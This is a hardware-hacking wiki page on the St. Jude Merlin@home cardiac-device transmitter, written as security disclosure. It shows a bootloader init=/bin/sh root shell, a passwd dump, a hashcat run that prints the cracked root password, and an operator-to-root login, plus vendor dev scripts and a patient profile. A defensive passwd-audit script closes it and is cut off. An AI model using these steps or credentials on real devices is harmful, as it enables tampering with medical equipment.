REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre><br />
<br />
Dev scripts in /root/. setdev.sh toggles a DEVELOPMENT flag in /data/config/TantoParms.conf, setlog.sh toggles two log-enable marker files, and devel_install.sh fetches a development package over plain FTP with a hard-coded username and password (redacted here), installs gdbserver and an SSH server with ipkg, and enables AUTOKEYGEN before starting sshd.<br />
<pre>root@(none):~# ls -lah /root<br />
drwxrwxr-x 3 root root 0 May 15 00:10 .<br />
drwxr-xr-x 20 root root 0 Jan 1 1970 ..<br />
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history<br />
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile<br />
drwx------ 2 root root 0 Jan 10 2013 .ssh<br />
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh<br />
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh<br />
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh<br />
<br />
root@(none):~# cat setdev.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setdev.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
elif [ $1 -eq 0 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat setlog.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setlog.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
touch /data/config/.tantolog<br />
touch /data/config/.dcllog<br />
elif [ $1 -eq 0 ]; then<br />
rm /data/config/.tantolog<br />
rm /data/config/.dcllog<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat devel_install.sh<br />
#!/bin/sh<br />
#<br />
# Script to download the devel package via scp from ftp.pacesetter.com<br />
# Username: REDACTED_USER. The script will prompt for a password which the <br />
# user has to enter. <br />
# <br />
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)<br />
<br />
# Setup the PATH. Don't assume we get a sane one<br />
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin<br />
<br />
# IP address of the server from which we download the devel package using scp.<br />
SERVER="10.16.155.27"<br />
<br />
function download_package()<br />
{<br />
# Download the devel package and the md5sum.txt file<br />
echo -e "\n==> Downloading $1 package using wget.\n"<br />
<br />
wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "scp failed..."<br />
exit 1<br />
fi<br />
}<br />
<br />
/root/setdev.sh 1<br />
/etc/init.d/tantoapp stop<br />
<br />
if [ ! -f /etc/password_key ]; then<br />
touch /etc/password_key<br />
fi<br />
<br />
echo "-----------------------------------------------------"<br />
echo "This script will install the development package" <br />
echo "This contains the following:"<br />
<br />
echo " 1. gdbserver"<br />
echo " 2. ssh server"<br />
echo " 3. procps (contains vmstat and top)"<br />
echo " 4. dos2unix and unix2dos"<br />
echo " 5. ftp client"<br />
echo " 6. mtd utilities (for diagnostics)"<br />
echo " 7. less utility"<br />
echo " 8. traceroute"<br />
echo " 9. agentd"<br />
echo " 10. monitord"<br />
echo "-----------------------------------------------------"<br />
<br />
sleep 2<br />
<br />
# Test if the server is reachable<br />
echo <br />
echo "---- Testing server connectivity ----"<br />
sleep 2<br />
ping -c 3 -w 10 $SERVER<br />
<br />
if [ "$?" != 0 ]; then<br />
echo <br />
echo "--- $SERVER not reachable. ---"<br />
echo " Will try connecting anyway (some firewalls block ping requests)".<br />
echo " Contact your network administrator if the connection fails"<br />
sleep 2<br />
else<br />
echo <br />
echo "--- Server reachable. Good! ---"<br />
echo<br />
fi<br />
<br />
TMPDIR="$HOME/devel$$"<br />
mkdir $TMPDIR<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "unable to create temporary directory. Check if you have write"<br />
echo "permissions in $HOME"<br />
fi<br />
<br />
cd $TMPDIR<br />
# Download the development packages<br />
echo<br />
echo "+----------------------------------------------+"<br />
echo "| Downloading development packages using wget. |"<br />
echo "+----------------------------------------------+"<br />
echo<br />
<br />
download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"<br />
<br />
echo<br />
echo "+---------------------------------------+"<br />
echo "| Installing the development utilities. |"<br />
echo "+---------------------------------------+"<br />
echo<br />
# The package is sane. Install it<br />
ipkg-cl -d root install *.ipk<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "Package installation failed"<br />
exit 1<br />
fi<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Performing required config modifications. |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh<br />
cp -a /tmp/ssh /etc/default/ssh<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Starting SSH Daemon . |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
/etc/init.d/ssh start<br />
<br />
echo<br />
echo "Devel package successfully installed"<br />
<br />
cd $HOME<br />
<br />
# delete TMPDIR<br />
rm -rf $TMPDIR<br />
<br />
exit 0</pre><br />
<br />
Sample patient profile<br />
<pre><?xml version="1.0" encoding="UTF-8"?><br />
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd"><br />
<SystemData><br />
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/><br />
<Controls><br />
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/><br />
<Switch name="UNPAIRED_MODE" value="Disable"/><br />
<Switch name="ENROLLMENT_CHANGE" value="Disable"/><br />
<Switch name="PROFILE_SYNC_PREF" value="Enable"/><br />
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/><br />
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/><br />
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/><br />
<iSwitch name="NOTIFY_DELAY_MED" value="0"/><br />
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/><br />
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/><br />
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/><br />
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/><br />
<tSwitch name="MERLIN_ID" value="512556937"/><br />
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/><br />
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/><br />
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/><br />
<tSwitch name="VOL_CTRL_PREF" value="OFF"/><br />
</Controls><br />
</SystemData><br />
<PayloadProfile Type="Follow-up"><br />
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/><br />
<Switch name="UNSCHED_FLP_PREF" value="Enable"/><br />
<Switch name="SCHED_FLP_PREF" value="Disable"/><br />
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/><br />
<Switch name="CLEAR_ST_FLAG" value="Disable"/><br />
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/><br />
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Device_Check"><br />
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="UNSCH_DCHK_PREF" value="Enable"/><br />
<Switch name="SCHED_DCHK_PREF" value="Disable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Alert_Controls"><br />
<Controls><br />
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/><br />
<Switch name="V_AUTOCAP_ALERT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/><br />
<Switch name="V_AUTOCAP_NOT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="CONG_MON_ALERT" value="Enable"/><br />
<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/><br />
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/><br />
<Switch name="PER_RV_PACING_ALERT" value="Enable"/><br />
<Switch name="CONG_MON_NOT" value="Disable"/><br />
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/><br />
<Switch name="PER_BIV_PACING_NOT" value="Disable"/><br />
<Switch name="PER_RV_PACING_NOT" value="Disable"/><br />
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_2_ALERT" value="Enable"/><br />
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/><br />
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/><br />
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/><br />
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/><br />
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_2_NOT" value="Disable"/><br />
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/><br />
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/><br />
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/><br />
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/><br />
<Switch name="LFDA_NSLN_ALERT" value="Enable"/><br />
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_1_ALERT" value="Enable"/><br />
<Switch name="LFDA_NSLN_NOT" value="Disable"/><br />
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_1_NOT" value="Enable"/><br />
<Switch name="AIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="CCRG_LMT_ALERT" value="Enable"/><br />
<Switch name="DEV_EOS_ALERT" value="Disable"/><br />
<Switch name="DEV_ERI_ALERT" value="Enable"/><br />
<Switch name="DEV_EVVI_ALERT" value="Enable"/><br />
<Switch name="DEV_RST_ALERT" value="Enable"/><br />
<Switch name="HVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="HW_BVVI_ALERT" value="Enable"/><br />
<Switch name="LVIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="OCD_ALERT" value="Enable"/><br />
<Switch name="SOSD_ALERT" value="Enable"/><br />
<Switch name="RVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="TTRPY_DIS_ALERT" value="Enable"/><br />
<Switch name="ATAF_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_VRATE_ALERT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/><br />
<Switch name="HV_TRPY_ALERT" value="Enable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/><br />
<Switch name="NOISE_REV_ALERT" value="Disable"/><br />
<Switch name="NSVT_EPIS_ALERT" value="Disable"/><br />
<Switch name="NSVF_EPIS_ALERT" value="Disable"/><br />
<Switch name="SPARE_1_ALERT" value="Disable"/><br />
<Switch name="SPARE_2_ALERT" value="Disable"/><br />
<Switch name="SPARE_3_ALERT" value="Disable"/><br />
<Switch name="SPARE_4_ALERT" value="Disable"/><br />
<Switch name="SPARE_5_ALERT" value="Disable"/><br />
<Switch name="AIMP_OOR_NOT" value="Disable"/><br />
<Switch name="CCRG_LMT_NOT" value="Disable"/><br />
<Switch name="DEV_EOS_NOT" value="Disable"/><br />
<Switch name="DEV_ERI_NOT" value="Disable"/><br />
<Switch name="DEV_EVVI_NOT" value="Disable"/><br />
<Switch name="DEV_RST_NOT" value="Disable"/><br />
<Switch name="HVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="HW_BVVI_NOT" value="Disable"/><br />
<Switch name="LVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="OCD_NOT" value="Disable"/><br />
<Switch name="SOSD_NOT" value="Disable"/><br />
<Switch name="RVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="TTRPY_DIS_NOT" value="Disable"/><br />
<Switch name="ATAF_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_VRATE_NOT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/><br />
<Switch name="HV_TRPY_NOT" value="Disable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_NOT" value="Disable"/><br />
<Switch name="NOISE_REV_NOT" value="Disable"/><br />
<Switch name="NSVT_EPIS_NOT" value="Disable"/><br />
<Switch name="NSVF_EPIS_NOT" value="Disable"/><br />
<Switch name="SPARE_1_NOT" value="Disable"/><br />
<Switch name="SPARE_2_NOT" value="Disable"/><br />
<Switch name="SPARE_3_NOT" value="Disable"/><br />
<Switch name="SPARE_4_NOT" value="Disable"/><br />
<Switch name="SPARE_5_NOT" value="Disable"/><br />
<iSwitch name="BIV_PACING_DURATION" value="7"/><br />
<iSwitch name="RV_PACING_DURATION" value="7"/><br />
<iSwitch name="ALERT_MASK_DURATION" value="4000"/><br />
<iSwitch name="PERCENT_BIV_PACING" value="100"/><br />
<iSwitch name="PERCENT_RV_PACING" value="100"/><br />
<br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="GDC"><br />
<GenerateSchedule GS_Interval="1440"/><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="SCHED_GDC_PREF" value="Disable"/><br />
<Switch name="CLEAR_GDC_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Maintenance"><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="MAINT_REBOOT_PREF" value="Disable"/><br />
<Switch name="MAINT_PREF" value="Enable"/><br />
<Switch name="RF_STAT_COLLECT" value="Disable"/><br />
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="MED"><br />
<GenerateSchedule GS_Interval="24"/><br />
<UploadSchedule US_Interval="7"/><br />
<Controls><br />
<Switch name="SCHED_MED_PREF" value="Enable"/><br />
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/><br />
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/><br />
<tSwitch name="MED_SCHEDULE_1" value="1100"/><br />
<tSwitch name="MED_SCHEDULE_2" value="0500"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Spare"><br />
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/><br />
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/><br />
<Controls><br />
<Switch name="SPARE_FLAG1" value="Disable"/><br />
<Switch name="SPARE_FLAG2" value="Enable"/><br />
<Switch name="SPARE_FLAG3" value="Disable"/><br />
<Switch name="SPARE_FLAG4" value="Disable"/><br />
<Switch name="SPARE_FLAG5" value="Disable"/><br />
<Switch name="SPARE_FLAG6" value="Disable"/><br />
<Switch name="SPARE_FLAG7" value="Disable"/><br />
<Switch name="SPARE_FLAG8" value="Disable"/><br />
<Switch name="SPARE_FLAG9" value="Disable"/><br />
<Switch name="SPARE_FLAG10" value="Disable"/><br />
<iSwitch name="SPARE_INTEGER1" value="0"/><br />
<iSwitch name="SPARE_INTEGER2" value="0"/><br />
<iSwitch name="SPARE_INTEGER3" value="0"/><br />
<iSwitch name="SPARE_INTEGER4" value="0"/><br />
<iSwitch name="SPARE_INTEGER5" value="0"/><br />
<iSwitch name="SPARE_INTEGER6" value="0"/><br />
<iSwitch name="SPARE_INTEGER7" value="0"/><br />
<iSwitch name="SPARE_INTEGER8" value="0"/><br />
<iSwitch name="SPARE_INTEGER9" value="0"/><br />
<iSwitch name="SPARE_INTEGER10" value="0"/><br />
<rSwitch name="SPARE_REAL4" value="0.0"/><br />
<rSwitch name="SPARE_REAL5" value="0.0"/><br />
<rSwitch name="SPARE_REAL6" value="0.0"/><br />
<rSwitch name="SPARE_REAL7" value="0.0"/><br />
<rSwitch name="SPARE_REAL8" value="0.0"/><br />
<rSwitch name="SPARE_REAL9" value="0.0"/><br />
<rSwitch name="SPARE_REAL10" value="0.0"/><br />
<rSwitch name="SPARE_REAL1" value="0.0"/><br />
<rSwitch name="SPARE_REAL2" value="0.0"/><br />
<rSwitch name="SPARE_REAL3" value="0.0"/><br />
<tSwitch name="SPARE_TEXT1" value=" "/><br />
<tSwitch name="SPARE_TEXT2" value=" "/><br />
<tSwitch name="SPARE_TEXT3" value=" "/><br />
<tSwitch name="SPARE_TEXT4" value=" "/><br />
<tSwitch name="SPARE_TEXT5" value=" "/><br />
<tSwitch name="SPARE_TEXT6" value=" "/><br />
<tSwitch name="SPARE_TEXT7" value=" "/><br />
<tSwitch name="SPARE_TEXT8" value=" "/><br />
<tSwitch name="SPARE_TEXT9" value=" "/><br />
<tSwitch name="SPARE_TEXT10" value=" "/><br />
</Controls><br />
</PayloadProfile><br />
</profile:ProfileList></pre></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2701SJM Merlin at Home2017-05-14T19:20:57Z<p>Rjmendez: SJM Merlin@home model EX1150</p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page is dedicated to a general overview of, and information about, the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
The Merlin@home Transmitter pairs with an implantable cardioverter-defibrillator (ICD) or pacemaker and uploads the device's data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on UART (3.3V) at 115200 baud. The UART pinout is shown below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) into a version of MontaVista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. Interrupting the bootloader's autoboot lets us pass our own kernel command line, and replacing init with /bin/sh (init=/bin/sh) drops straight into a root shell before the application stack starts.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
From that shell we can pull some useful information off the device, starting with /etc/passwd. There is no /etc/shadow, so the root password hash sits in the world-readable passwd file.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Let's break this. The 13-character hash is traditional descrypt (DES crypt), hashcat mode 1500; a seven-character printable-ASCII mask recovers it in seconds on a single GTX 980.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to log in as root on the console fail. What is going on with that operator user? It has a locked password, but GID 0 and a home directory of /root:<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Let's set the operator password to "test" and attempt to log in. The passwd entry now carries a hash:<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
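<br />
Two properties of this passwd file made the above possible: the root hash is stored in the world-readable passwd (no shadow) as descrypt, whose keyspace is small because DES crypt only uses the first eight characters of the password, and the operator account has GID 0, a home of /root and an empty shell field. The script below, an added example that is not code from this page or from St. Jude Medical, audits a passwd dump for exactly those conditions and works out the keyspace behind the hashcat run above. The sample entries are constructed from the dump shown earlier.<br />
<br />
```python
"""Audit a dumped /etc/passwd for the weaknesses used on this page.

Added example (not code from the page or from St. Jude Medical). It flags:
  * password hashes stored in passwd itself, and which are descrypt
    (13 characters of [./0-9A-Za-z]); descrypt truncates to 8 characters,
    so the keyspace is bounded regardless of how long the password was;
  * non-root accounts with uid 0 or gid 0, or a home directory under /root;
  * accounts with an empty shell field (login falls back to /bin/sh).
"""
import re
from dataclasses import dataclass

# Constructed sample: the entries that matter, copied from the dump above.
SAMPLE_PASSWD = """\
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
operator:*:12:0:operator:/root:
sshd:*:18:100:sshd:/var/run/sshd:
nobody:*:65534:65534:nobody:/home:/bin/sh
"""

DESCRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
PRINTABLE_ASCII = 95          # size of hashcat's ?a charset
LOCKED = ("x", "*", "!", "")  # values that are not a usable hash


@dataclass
class Finding:
    user: str
    issue: str


def descrypt_keyspace(max_len: int = 8) -> int:
    """Candidates for printable-ASCII passwords of length 1..max_len.
    descrypt ignores everything past 8 characters, so max_len=8 is the
    true upper bound for any password, however long."""
    return sum(PRINTABLE_ASCII ** n for n in range(1, max_len + 1))


def hours_to_exhaust(candidates: int, rate_per_second: float) -> float:
    """Worst-case time to walk a keyspace at a given cracking rate."""
    return candidates / rate_per_second / 3600.0


def audit_passwd(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line, "malformed entry"))
            continue
        user, pw, uid, gid, _gecos, home, shell = fields
        if pw not in LOCKED:
            if DESCRYPT_RE.match(pw):
                kind = "descrypt (DES, salt %r, password truncated to 8 chars)" % pw[:2]
            else:
                kind = "hash"
            findings.append(Finding(user, f"password hash in world-readable passwd: {kind}"))
        if pw == "":
            findings.append(Finding(user, "empty password field"))
        if user != "root" and uid == "0":
            findings.append(Finding(user, "uid 0"))
        if user != "root" and gid == "0":
            findings.append(Finding(user, "gid 0 (root group)"))
        if user != "root" and (home == "/root" or home.startswith("/root/")):
            findings.append(Finding(user, "home directory under /root"))
        if shell == "":
            findings.append(Finding(user, "empty shell field (login uses /bin/sh)"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.issue}")
    # The ?a x7 mask used above: 95**7 candidates, the Progress denominator
    # hashcat printed. At the reported 544.7 MH/s that is about 35.6 hours
    # worst case; the full 1..8 descrypt bound is 95x larger.
    seven = descrypt_keyspace(7) - descrypt_keyspace(6)
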